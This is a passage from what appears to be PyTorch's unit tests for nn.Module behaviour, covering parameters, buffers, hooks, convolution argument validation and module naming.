self.layer_dummy_param = Parameter(torch.empty(3, 5))
self.register_buffer('layer_dummy_buf', torch.zeros(1, 3, 3, 7))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = Layer()
self.dummy_param = Parameter(torch.empty(3, 5))
self.register_buffer('dummy_buf', torch.zeros(7, 3, 3, 1))
l = Layer()
n = Net()
s = nn.Sequential(n, n)
return l, n, s
def test_requires_grad_(self):
m = self._create_basic_net()[-1]
assert len(list(m.buffers())) > 0, 'invalid test'
assert all(not b.requires_grad for b in m.buffers()) > 0, 'invalid test'
assert len(list(m.parameters())) > 0, 'invalid test'
assert all(p.requires_grad for p in m.parameters()) > 0, 'invalid test'
for requires_grad in (False, True):
self.assertIs(m.requires_grad_(requires_grad), m)
for p in m.parameters():
self.assertEqual(p.requires_grad, requires_grad)
for b in m.buffers():
self.assertFalse(b.requires_grad)
def test_module_backcompat(self):
from torch.serialization import SourceChangeWarning
path = download_file('https://download.pytorch.org/test_data/linear.pt')
with warnings.catch_warnings():
warnings.simplefilter('ignore', SourceChangeWarning)
m = torch.load(path)
input = torch.randn(2, 3, dtype=torch.float)
self.assertEqual(m(input).size(), (2, 5))
def test_conv_backcompat(self):
from torch.serialization import SourceChangeWarning
# This file was generated by running on PyTorch 1.0.1 on Python 2:
#
# import torch
# from torch import nn
# m = nn.Conv2d(1, 1, 1)
# torch.save(m, 'legacy_conv2d.pt')
#
# NB: This Pickle also contains some Unicode data!
path = download_file('https://download.pytorch.org/test_data/legacy_conv2d.pt')
with warnings.catch_warnings():
warnings.simplefilter('ignore', SourceChangeWarning)
m = torch.load(path, encoding='utf-8')
input = torch.randn((1, 1, 1, 1), dtype=torch.float)
self.assertEqual(m(input).size(), (1, 1, 1, 1))
def test_share_memory(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.p = nn.Parameter(torch.eye(5))
self.par = nn.ParameterList()
self.par.append(nn.Parameter(torch.randn(10)))
def forward(self, inp):
# NB: dead code
return inp.clone()
net = Net()
for p in net.parameters():
self.assertFalse(p.storage().is_shared())
for b in net.buffers():
self.assertFalse(b.storage().is_shared())
net.share_memory()
for p in net.parameters():
self.assertTrue(p.storage().is_shared())
for b in net.buffers():
self.assertTrue(b.storage().is_shared())
def _test_hooks(self, backward_register_fn):
module = nn.Sigmoid()
input = torch.ones(5, 5, requires_grad=True)
counter = {
'forwards': 0,
'backwards': 0
}
def fw_hook(inc, h_module, input, output):
self.assertIsInstance(input, tuple)
self.assertTrue(isinstance(output, torch.Tensor))
self.assertTrue(h_module is module)
self.assertEqual(input[0], torch.ones(5, 5))
self.assertEqual(output, torch.empty(5, 5).fill_(1 / (1 + 1 / math.e)))
counter['forwards'] += inc
def bw_hook(inc, h_module, grad_input, grad_output):
self.assertIsInstance(grad_input, tuple)
self.assertIsInstance(grad_output, tuple)
self.assertTrue(h_module is module)
self.assertEqual(grad_output[0], torch.ones(5, 5) * 2)
counter['backwards'] += inc
test_fwd = module.register_forward_hook(lambda *args: fw_hook(1, *args))
module(input)
module(input)
self.assertEqual(counter['forwards'], 2)
self.assertEqual(counter['backwards'], 0)
test_bwd = getattr(module, backward_register_fn)(
lambda *args: bw_hook(1, *args))
output = module(input)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 0)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 1)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 2)
test2_fwd = module.register_forward_hook(lambda *args: fw_hook(2, *args))
output = module(input)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 2)
test2_bwd = getattr(module, backward_register_fn)(lambda *args: bw_hook(2, *args))
module(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 9)
self.assertEqual(counter['backwards'], 5)
test2_bwd.remove()
module(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 12)
self.assertEqual(counter['backwards'], 6)
test2_fwd.remove()
module(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 13)
self.assertEqual(counter['backwards'], 7)
test_fwd.remove()
test_bwd.remove()
def test_hooks(self):
self._test_hooks("register_backward_hook")
self._test_hooks("register_full_backward_hook")
def test_hook_cpp(self):
bn = nn.BatchNorm1d(5)
def hook(module, grad_inputs, grad_outputs):
self.assertEqual(len(grad_inputs), 1)
self.assertEqual(len(grad_outputs), 1)
self.assertEqual(module, bn)
bn.register_full_backward_hook(hook)
output = bn(torch.randn(5, 5, requires_grad=True))
output.sum().backward()
def test_hook_invalid_outputs(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
def bw_fail1(self, grad_input, grad_output):
return grad_input[:-1]
def bw_fail2(self, grad_input, grad_output):
return grad_input + (torch.randn(2, 2),)
with module.register_backward_hook(bw_fail1):
with self.assertRaisesRegex(RuntimeError, 'got 0, but expected 1'):
module(input).sum().backward()
with module.register_backward_hook(bw_fail2):
with self.assertRaisesRegex(RuntimeError, 'got 2, but expected 1'):
module(input).sum().backward()
def test_hook_requires_grad(self):
test_self = self
class MyModule(nn.Module):
def forward(self, arg1, arg2, arg3):
test_self.assertTrue(arg1.requires_grad)
test_self.assertFalse(arg2.requires_grad)
test_self.assertTrue(arg3.requires_grad)
return arg1.sum() + arg2.sum() + arg3.sum()
inp = torch.rand(2, requires_grad=True)
mod = MyModule()
mod(inp, inp.detach(), inp)
# Ensure that requires grad is properly propagated
mod.register_full_backward_hook(lambda mod, gI, gO: None)
mod(inp, inp.detach(), inp)
def test_hook_no_requires_grad(self):
mod = nn.Linear(2, 3)
inp = torch.rand(1, 2)
return_val = "None"
hook_called = [0]
def hook(mod, grad_input, grad_output):
hook_called[0] += 1
for gI in grad_input:
self.assertIsNone(gI)
for gO in grad_output:
self.assertEqual(gO.size(), (1, 3))
if return_val == "grad_input":
return grad_input
elif return_val == "invalid":
# If the inputs were requiring gradients, this would be
# a valid return
return inp
elif return_val == "None":
return None
else:
raise RuntimeError("Invalid return_val string")
mod.register_full_backward_hook(hook)
# This should run and trigger the hook properly
mod(inp).sum().backward()
self.assertEqual(hook_called[0], 1)
return_val = "grad_input"
mod(inp).sum().backward()
self.assertEqual(hook_called[0], 2)
return_val = "invalid"
with self.assertRaisesRegex(RuntimeError, "where no input requires gradient"):
mod(inp).sum().backward()
def test_hook_last_arg_requires_grad(self):
mod = nn.L1Loss()
inp = torch.rand(1, requires_grad=True)
mod.register_full_backward_hook(lambda m, gI, gO: None)
try:
mod(inp.detach(), inp)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
def test_hook_extra_input(self):
class MyModule(nn.Module):
def forward(self, non_tensor, tensor):
return tensor.clone(), non_tensor
inp = torch.rand(2, requires_grad=True)
mod = MyModule()
def hook(mod, grad_input, grad_output):
self.assertIsNone(grad_input[0])
self.assertIsInstance(grad_input[1], torch.Tensor)
self.assertIsInstance(grad_output[0], torch.Tensor)
self.assertIsNone(grad_output[1])
mod.register_full_backward_hook(hook)
out, _ = mod(True, inp)
out.sum().backward()
def test_hook_inplace(self):
class MyModule(nn.Module):
def forward(self, inp, do_inplace):
self.inp = inp
if do_inplace:
inp += 1
return inp.clone()
hook_called = [0]
def hook(mod, grad_input, grad_output):
hook_called[0] += 1
inp = torch.rand(10, requires_grad=True)
mod = MyModule()
mod.register_full_backward_hook(hook)
# No inplace should work
mod(inp, False).sum().backward()
self.assertEqual(hook_called[0], 1)
# Input inplace error should throw an error
with self.assertRaisesRegex(RuntimeError, "Output 0 of BackwardHookFunctionBackward is "
"a view and is being modified inplace."):
mod(inp.clone(), True)
# Input inplace error should throw an error if we try to re-use the view after they have
# been modified
local_inp = inp.clone()
out = mod(local_inp, False)
local_inp[0] *= 1
with self.assertRaisesRegex(RuntimeError, "Output 0 of BackwardHookFunctionBackward is "
"a view and its base or another view"):
# Any operation involving the view will fail here
mod.inp + 2
# Output inplace error should throw an error
out = mod(inp, False)
with self.assertRaisesRegex(RuntimeError, "BackwardHookFunctionBackward is a view "
"and is being modified inplace."):
out += 1
def test_hook_non_full_warning(self):
def noop(*args):
pass
a = torch.rand(2, requires_grad=True)
b = torch.rand(2, requires_grad=True)
# Check invalid input container
class MyModule(nn.Module):
def forward(self, l):
return l[0].clone(), l[1].clone()
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "does not take as input a single Tensor or a tuple of Tensors"):
m([a, b])
# Check invalid output container
class MyModule(nn.Module):
def forward(self, a, b):
return [a.clone(), b.clone()]
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "does not return a single Tensor or a tuple of Tensors"):
m(a, b)
# Check invalid output from different Nodes
class MyModule(nn.Module):
def forward(self, a, b):
return a.clone(), b.clone()
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "outputs are generated by different autograd Nodes"):
m(a, b)
# Check invalid forward with multiple Nodes
class MyModule(nn.Module):
def forward(self, a):
return a.clone().clone()
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "the forward contains multiple autograd Nodes"):
m(a)
def test_hook_backward_size(self):
# Make module with multiple operations in forward
# And different size for input and outputs
class MyModule(nn.Module):
def forward(self, arg1, arg2):
tmp = arg1.sum() * arg2
tmp = tmp + arg2.sum() * arg1.sum()
tmp = tmp.sum().view(1)
tmp = tmp.expand(8).contiguous()
return tmp
module = MyModule()
inp1 = torch.randn(5, 5, requires_grad=True)
inp2 = torch.randn(10, 10, requires_grad=True)
def bw_hook(module, grad_input, grad_output):
self.assertEqual(len(grad_input), 2)
self.assertEqual(grad_input[0].size(), torch.Size([5, 5]))
self.assertEqual(grad_input[1].size(), torch.Size([10, 10]))
self.assertEqual(len(grad_output), 1)
self.assertEqual(grad_output[0].size(), torch.Size([8]))
with module.register_full_backward_hook(bw_hook):
module(inp1, inp2).sum().backward()
def test_hook_backward_writeable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.nn.functional.sigmoid(input)
def bw_hook(module, grad_input, grad_output):
for grad in grad_input:
self.assertTrue(isinstance(grad, torch.Tensor))
for grad in grad_output:
self.assertTrue(isinstance(grad, torch.Tensor))
return tuple(gi * 2 for gi in grad_input)
module.register_backward_hook(bw_hook)
module(input).backward(torch.ones(5, 5))
expected_grad = sig_x * (1 - sig_x) * 2
self.assertEqual(input.grad, expected_grad)
def test_hook_forward_preforward_writable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.nn.functional.sigmoid(input)
def forward_pre_hook(m, input):
return torch.nn.functional.relu(input[0])
def forward_hook(m, input, output):
return -output
module.register_forward_pre_hook(forward_pre_hook)
module.register_forward_hook(forward_hook)
output = module(input)
expected_res = -torch.nn.functional.sigmoid(torch.nn.functional.relu(input))
self.assertEqual(output, expected_res)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
mask = (input > 0).double()
expected_grad = -sig_x * (1 - sig_x) * 2 * mask
self.assertEqual(input.grad, expected_grad)
def test_to(self):
m = nn.Linear(3, 5)
self.assertIs(m, m.to('cpu'))
self.assertIs(m, m.to('cpu', dtype=torch.float32))
self.assertEqual(m.double(), m.to(torch.float64))
self.assertRaises(RuntimeError, lambda: m.to('cpu', copy=True))
if torch.cuda.is_available():
for cuda in ['cuda', 'cuda:0' if torch.cuda.device_count() == 1 else 'cuda:1']:
m2 = m.cuda(device=cuda)
self.assertIs(m2, m2.to(cuda))
self.assertEqual(m, m2.to('cpu'))
self.assertEqual(m2, m.to(cuda))
self.assertIs(m2, m2.to(dtype=torch.float32))
self.assertEqual(m2.double(), m2.to(dtype=torch.float64))
def test_zero_grad(self):
i = torch.randn(2, 5, requires_grad=True)
module = nn.Linear(5, 5)
for p in module.parameters():
p.requires_grad = False
module.zero_grad()
module.weight.requires_grad = True
module.zero_grad()
self.assertIsNone(module.weight.grad) # uninitialized grad
module(i).sum().backward()
self.assertIsNotNone(module.weight.grad)
self.assertGreater(module.weight.grad.data.abs().sum(), 0)
module.zero_grad()
self.assertEqual(module.weight.grad.data, module.weight.data.clone().zero_())
module.bias.requires_grad = True
module.zero_grad()
self.assertIsNotNone(module.weight.grad)
self.assertIsNone(module.bias.grad)
module(i).sum().backward()
self.assertIsNotNone(module.weight.grad)
self.assertIsNotNone(module.bias.grad)
self.assertGreater(module.weight.grad.data.abs().sum(), 0)
self.assertGreater(module.bias.grad.data.abs().sum(), 0)
module.zero_grad()
self.assertEqual(module.weight.grad.data, module.weight.data.clone().zero_())
self.assertEqual(module.bias.grad.data, module.bias.data.clone().zero_())
# Force set to None.
module.zero_grad(set_to_none=True)
self.assertIsNone(module.weight.grad)
def test_no_grad(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = nn.Conv2d(2, 5, kernel_size=3, padding=1).to(dtype)
input = torch.randn(1, 2, 10, 10).to(dtype)
x = input
y = input.clone()
output = module(x)
self.assertTrue(output.requires_grad)
output.backward(torch.ones(1, 5, 10, 10))
with torch.no_grad():
output2 = module(y)
self.assertFalse(output2.requires_grad)
self.assertRaises(RuntimeError, lambda: output2.backward(torch.ones(1, 5, 10, 10)))
def test_invalid_conv1d(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = nn.Conv1d(in_channels=3, out_channels=33, kernel_size=10, stride=1, bias=True).to(dtype)
input = torch.randn(1, 3, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError,
r'Calculated padded input size per channel: \(4\). ' +
r'Kernel size: \(10\). Kernel size can\'t be greater than actual input size'):
module(input)
# Negative stride check
module = nn.Conv1d(in_channels=3, out_channels=6, kernel_size=3, stride=-1, bias=True).to(dtype)
input = torch.randn(1, 3, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
def test_mismatch_shape_conv2d(self):
x = torch.randn(1, 10, 1, 28, 28)
w = torch.randn(6, 1, 5, 5)
with self.assertRaisesRegex(RuntimeError,
r'Expected 4-dimensional input for 4-dimensional weight \[6, 1, 5, 5\],' +
r' but got 5-dimensional input of size \[1, 10, 1, 28, 28\] instead'):
F.conv2d(x, w)
def test_conv2d_discontiguous_weight(self):
# Test for https://github.com/pytorch/pytorch/issues/55781
x = torch.ones(64, 16, 16, 16)
weight = torch.arange(0, 1.0, 1 / 2.0 ** 10).reshape(32, 16, 1, 2)[:, :, :, ::2]
self.assertFalse(weight.is_contiguous())
y = torch.nn.functional.conv2d(x, weight, None)
if torch.backends.mkldnn.is_available():
# Disable MKLDNN explicitly, so that either NNPACK or THCNN will be used
with torch.backends.mkldnn.flags(enabled=False):
y_ = torch.nn.functional.conv2d(x, weight, None)
self.assertEqual(y, y_)
self.assertEqual(y.sum(), 4186112.)
def test_invalid_conv2d(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = torch.nn.Conv2d(1, 1, kernel_size=3, dilation=2, stride=2).to(dtype)
input = torch.empty(1, 1, 4, 4).to(dtype)
self.assertRaises(RuntimeError, lambda: module(input))
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, stride=1, bias=True)
input = torch.randn(1, 3, 1, 1)
with self.assertRaisesRegex(RuntimeError,
r'Calculated padded input size per channel: \(1 x 1\). ' +
r'Kernel size: \(10 x 10\). Kernel size can\'t be greater than actual input size'):
module(input)
# Negative stride check
module = nn.Conv2d(in_channels=3, out_channels=6, kernel_size=4, stride=-1, bias=True).to(dtype)
input = torch.randn(1, 3, 4, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
# Zero stride check
module = nn.Conv2d(in_channels=3, out_channels=6, kernel_size=4, stride=0, bias=True).to(dtype)
input = torch.randn(1, 3, 4, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
def test_invalid_conv3d(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = torch.nn.Conv3d(1, 1, kernel_size=3, dilation=2, stride=2).to(dtype)
input = torch.empty(1, 1, 4, 4, 4).to(dtype)
self.assertRaises(RuntimeError, lambda: module(input))
# Negative stride check
module = torch.nn.Conv3d(1, 1, kernel_size=3, stride=-2)
input = torch.empty(1, 1, 4, 4, 4)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
def test_Conv1d_module_same_padding(self):
# Compare module against functional: without strides/dilation, asymmetric padding
x = torch.rand(1, 1, 20)
module = nn.Conv1d(in_channels=1, out_channels=1, kernel_size=10,
padding='same')
expect = F.conv1d(x, module.weight, module.bias, padding='same')
self.assertEqual(expect, module(x))
# Test dilation, symmetric padding
module = nn.Conv1d(in_channels=1, out_channels=1, kernel_size=10,
padding='same', dilation=2)
expect = F.conv1d(x, module.weight, module.bias, padding='same', dilation=2)
self.assertEqual(expect, module(x))
# Test non-zero padding_mode, requiring explicit padding
module = nn.Conv1d(in_channels=1, out_channels=1, kernel_size=10,
padding='same', padding_mode='replicate')
x_padded = F.pad(x, [4, 5], mode='replicate')
expect = F.conv1d(x_padded, module.weight, module.bias, padding='valid')
self.assertEqual(expect, module(x))
self.assertEqual(x.size(), expect.size())
# Test connstruction with invalid padding string raises
with self.assertRaisesRegex(ValueError, 'Invalid padding string'):
module = nn.Conv1d(in_channels=3, out_channels=33, kernel_size=10, padding='foo')
# Test connstruction with same padding and strides raises
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv1d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=2)
def test_Conv2d_module_same_padding(self):
# Compare module against functional:
# without strides/dilation, both symmetric and asymmetric padding
x = torch.rand(1, 1, 9, 20)
module = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(5, 10),
padding='same')
expect = F.conv2d(x, module.weight, module.bias, padding='same')
self.assertEqual(expect, module(x))
# with dilation, symmetric padding
module = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(3, 4),
padding='same', dilation=(1, 2))
expect = F.conv2d(x, module.weight, module.bias, padding='same', dilation=(1, 2))
self.assertEqual(expect, module(x))
# Test non-zero padding_mode, requiring explicit padding
module = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(3, 4),
padding='same', padding_mode='reflect')
x_padded = F.pad(x, [1, 2, 1, 1], mode='reflect')
expect = F.conv2d(x_padded, module.weight, module.bias, padding='valid')
self.assertEqual(expect, module(x))
self.assertEqual(x.size(), expect.size())
# Test connstruction with invalid padding string raises
with self.assertRaisesRegex(ValueError, 'Invalid padding string'):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='foo')
# Test connstruction with same padding and strides raises
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=2)
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(1, 3))
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(4, 1))
def test_Conv3d_module_same_padding(self):
# Compare module against functional:
x = torch.rand(1, 1, 4, 4, 4)
# without dilation, both symmetric and asymmetric padding
module = nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(2, 3, 4),
padding='same')
expect = F.conv3d(x, module.weight, module.bias, padding='same')
self.assertEqual(expect, module(x))
# with dilation, both symmetric and asymmetric padding
module = nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(2, 3, 4),
padding='same', dilation=(3, 2, 1))
expect = F.conv3d(x, module.weight, module.bias, padding='same', dilation=(3, 2, 1))
self.assertEqual(expect, module(x))
# Test non-zero padding_mode, requiring explicit padding
module = nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(2, 3, 4),
padding='same', padding_mode='circular')
x_padded = F.pad(x, [1, 2, 1, 1, 0, 1], mode='circular')
expect = F.conv3d(x_padded, module.weight, module.bias, padding='valid')
self.assertEqual(expect, module(x))
self.assertEqual(x.size(), expect.size())
# Test connstruction with invalid padding string raises
with self.assertRaisesRegex(ValueError, 'Invalid padding string'):
module = nn.Conv3d(in_channels=3, out_channels=33, kernel_size=10, padding='foo')
# Test connstruction with same padding and strides raises
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=2)
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(1, 1, 3))
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(1, 4, 1))
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(5, 1, 1))
def _test_alpha_dropout(self, cls, input):
mean = input.mean()
std = input.std()
for p in [0.2, 0.5, 0.8]:
module = cls(p)
input_var = input.detach().clone().requires_grad_()
output = module(input_var)
# output mean should be close to input mean
self.assertLess(abs(output.data.mean() - mean), 0.1)
# output std should be close to input std
self.assertLess(abs(output.data.std() - std), 0.1)
output.backward(input)
def test_parameters_and_named_parameters(self):
def names(named_parameters):
return [k for k, _ in named_parameters]
l, n, s = self._create_basic_net()
self.assertEqual(len(list(l.parameters())), 1)
self.assertEqual(
names(l.named_parameters()),
['layer_dummy_param'])
self.assertEqual(len(list(n.parameters())), 2)
self.assertEqual(
names(n.named_parameters()),
['dummy_param', 'l1.layer_dummy_param'])
self.assertEqual(len(list(n.parameters(recurse=False))), 1)
self.assertEqual(
names(n.named_parameters(recurse=False)),
['dummy_param'])
self.assertEqual(len(list(s.parameters())), 2)
self.assertEqual(
names(s.named_parameters()),
['0.dummy_param', '0.l1.layer_dummy_param'])
def test_buffers_and_named_buffers(self):
def names(named_buffers):
return [k for k, _ in named_buffers]
l, n, s = self._create_basic_net()
self.assertEqual(len(list(l.buffers())), 1)
self.assertEqual(
names(l.named_buffers()),
['layer_dummy_buf'])
self.assertEqual(len(list(n.buffers())), 2)
self.assertEqual(
names(n.named_buffers()),
['dummy_buf', 'l1.layer_dummy_buf'])
self.assertEqual(len(list(n.buffers(recurse=False))), 1)
self.assertEqual(
names(n.named_buffers(recurse=False)),
['dummy_buf'])
self.assertEqual(len(list(s.buffers())), 2)
self.assertEqual(
names(s.named_buffers()),
['0.dummy_buf', '0.l1.layer_dummy_buf'])
def test_call_supports_python_dict_output(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = nn.Linear(10, 20)
self.register_backward_hook(self.hook)
self.check_backward_hook_flag = False
def hook(self, module, grad_out, grad_in):
self.check_backward_hook_flag = True
def forward(self, inputs):
return {"output": self.l1(inputs).sum()}
net = Net()
model_output = net(torch.randn([5, 10]))
model_output["output"].backward()
self.assertTrue(net.check_backward_hook_flag)
def test_children(self):
l1 = nn.Linear(2, 2)
l2 = nn.Linear(2, 2)
l3 = nn.Linear(2, 2)
l4 = nn.Linear(2, 2)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential(l1, l2, l1, l2, subnet)
self.assertEqual(list(s.children()), [l1, l2, subnet])
def test_train_errors_for_invalid_mode(self):
class SubclassNet(nn.Module):
def __init__(self):
super(SubclassNet, self).__init__()
self.l1 = nn.Linear(2, 2)
def forward(self, inputs):
return self.l1(inputs)
subclass_net = SubclassNet()
sequential_net = nn.Sequential(nn.Linear(2, 2), nn.Linear(2, 2))
error_modes = ["invalid_str", torch.device('cpu')]
modules_to_check = [subclass_net, sequential_net]
for error_mode, module in itertools.product(error_modes, modules_to_check):
with self.assertRaises(ValueError):
module.train(error_mode)
def test_dir(self):
linear = nn.Linear(2, 2)
linear._test_submodule = nn.Linear(2, 2)
linear._test_parameter = Parameter(torch.empty(2, 2))
linear.register_buffer('_test_buffer', torch.empty(2, 2))
keys = dir(linear)
self.assertIn('_test_submodule', keys)
self.assertIn('_test_parameter', keys)
self.assertIn('_test_buffer', keys)
for key in keys:
self.assertTrue(hasattr(linear, key))
def test_repr(self):
# no extra information or sub-modules
empty_sequential = nn.Sequential()
expected_repr_empty = 'Sequential()'
self.assertEqual(repr(empty_sequential), expected_repr_empty)
# one liner extra information
linear = nn.Linear(1, 1)
expected_repr_linear = 'Linear(in_features=1, out_features=1, bias=True)'
self.assertEqual(repr(linear), expected_repr_linear)
# sub-modules repr
sequential = nn.Sequential(linear)
expected_repr_sequential = 'Sequential(\n' \
' (0): Linear(in_features=1, out_features=1, bias=True)\n' \
')'
self.assertEqual(repr(sequential), expected_repr_sequential)
def test_dir_digit(self):
model = nn.Sequential(nn.Linear(2, 2))
keys = dir(model)
self.assertNotIn('0', keys)
def test_named_children(self):
l1 = nn.Linear(2, 2)
l2 = nn.Linear(2, 2)
l3 = nn.Linear(2, 2)
l4 = nn.Linear(2, 2)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential()
with self.assertRaises(KeyError):
s.add_module('', l1)
with self.assertRaises(KeyError):
s.add_module('name.with.dot', l1)
s.add_module('layer1', l1)
s.add_module('layer2', l2)
s.add_module('layer3', l1)
s.add_module('layer4', l2)
s.add_module('subnet', subnet)
self.assertEqual(list(s.named_children()), [('layer1', l1), ('layer2', l2), ('subnet', subnet)])
def test_modules(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = l
self.l2 = l
self.param = torch.empty(3, 5)
l = nn.Linear(10, 20)
n = Net()
s = nn.Sequential(n, n, n, n)
self.assertEqual(list(s.modules()), [s, n, l])
def test_named_modules(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = l
self.l2 = l
self.param = torch.empty(3, 5)
self.block = block
l = nn.Linear(10, 20)
l1 = nn.Linear(10, 20)
l2 = nn.Linear(10, 20)
block = nn.Sequential()
block.add_module('linear1', l1)
block.add_module('linear2', l2)
n = Net()
s = nn.Sequential(n, n)
self.assertEqual(list(s.named_modules()), [('', s), ('0', n), ('0.l1', l),
('0.block', block), ('0.block.linear1', l1),
('0.block.linear2', l2)])
# test the option to not remove duplicate module instances
self.assertEqual(list(s.named_modules(remove_duplicate=False)), [
('', s), ('0', n), ('0.l1', l), ('0.l2', l),
('0.block', block), ('0.block.linear1', l1),
('0.block.linear2', l2),
('1', n), ('1.l1', l), ('1.l2', l),
('1.block', block), ('1.block.linear1', l1),
('1.block.linear2', l2)])
def test_register_buffer_raises_error_if_name_is_not_string(self):
m = nn.Module()
expected_error = 'buffer name should be a string. Got '
with self.assertRaisesRegex(TypeError, expected_error + 'int'):
m.register_buffer(1, torch.rand(5))
with self.assertRaisesRegex(TypeError, expected_error + 'NoneType'):
m.register_buffer(None, torch.rand(5))
def test_register_buffer_raises_error_if_attr_exists(self):
m = nn.Module()
m.attribute_name = 5
with self.assertRaises(KeyError):
m.register_buffer('attribute_name', torch.rand(5))
del m.attribute_name
m.register_parameter('attribute_name', nn.Parameter())
with self.assertRaises(KeyError):
m.register_buffer('attribute_name', torch.rand(5))
del m.attribute_name
m.add_module('attribute_name', nn.Module())
with self.assertRaises(KeyError):
m.register_buffer('attribute_name', torch.rand(5))
def test_register_buffer_raises_error_if_not_tensor(self):
m = nn.Module()
with self.assertRaises(TypeError):
m.register_buffer('attribute_name', 5)
def test_register_buffer_allows_overwriting_with_same_name(self):
m = nn.Module()
buffer1 = torch.rand(5)
buffer2 = buffer1 + 5
buffer3 = None
m.register_buffer('buffer_name', buffer1)
self.assertEqual(m.buffer_name, buffer1)
m.register_buffer('buffer_name', buffer2)
self.assertEqual(m.buffer_name, buffer2)
m.register_buffer('buffer_name', buffer3)
self.assertEqual(m.buffer_name, buffer3)
def test_get_buffer(self):
m = nn.Module()
buffer1 = torch.randn(2, 3)
buffer2 = torch.randn(4, 5)
m.register_buffer('foo', buffer1)
m.register_buffer('bar', buffer2)
self.assertEqual(buffer1, m.get_buffer('foo'))
self.assertEqual(buffer2, m.get_buffer('bar'))
def test_get_buffer_from_submodules(self):
class MyModule(nn.Module):
def __init__(self, foo, bar):
super().__init__()
self.sub = Sub(foo, bar)
class Sub(nn.Module):
def __init__(self, foo, bar):
super().__init__()
self.register_buffer('foo', foo)
self.subsub = SubSub(bar)
class SubSub(nn.Module):
def __init__(self, bar):
super().__init__()
self.register_buffer('bar', bar)
foo = torch.randn(2, 3)
bar = torch.randn(4, 5)
m = MyModule(foo, bar)
self.assertEqual(foo, m.get_buffer('sub.foo'))
self.assertEqual(bar, m.get_buffer('sub.subsub.bar'))
def test_buffer_not_persistent(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 0)
def test_buffer_not_persistent_del(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
del m.buf
self.assertTrue(len(list(m.buffers())) == 0)
def test_buffer_not_persistent_overwrite(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
m.register_buffer('buf', torch.rand(5))
# can we overwrite a non-persistent buffer with a persistent one?
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 1)
# can we overwrite a persistent buffer with a non-persistent one?
m.register_buffer('buf', torch.rand(5), persistent=False)
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 0)
def test_buffer_not_persistent_assign(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
# Assigning None removes the buffer but if we then assign a new Tensor
# to the same property, it should still be marked as a buffer.
m.buf = None
self.assertTrue(len(list(m.buffers())) == 0)
